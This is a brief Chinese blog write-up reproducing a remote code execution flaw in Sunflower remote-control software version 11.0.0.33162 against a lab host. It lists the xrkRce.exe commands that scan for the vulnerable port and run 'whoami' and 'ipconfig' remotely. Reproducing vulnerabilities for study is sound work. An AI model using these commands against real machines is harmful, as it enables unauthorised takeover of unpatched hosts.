向日葵RCE复现

1、影响版本

11.0.0.33162

2、存在漏洞主机:192.168.1.9

 

3、扫描是否存在RCE漏洞

存在,端口是51258

.\xrkRce.exe -h 192.168.1.9 -t scan

 

4、RCE利用

成功执行whoami、ipconfig命令

.\xrkRce.exe -h 192.168.1.9 -t rce -p 51258 -c "whoami"

 .\xrkRce.exe -h 192.168.1.9 -t rce -p 51258 -c "ipconfig"

 

 声明:文章只用于学习交流,由于利用的信息而造成的任何或直接的此文传播后果,作者不承担任何直接责任,一切法律后果均由攻击者承担!

posted @ 2022-02-20 15:54  BruceTyler  阅读(794)  评论(0编辑  收藏  举报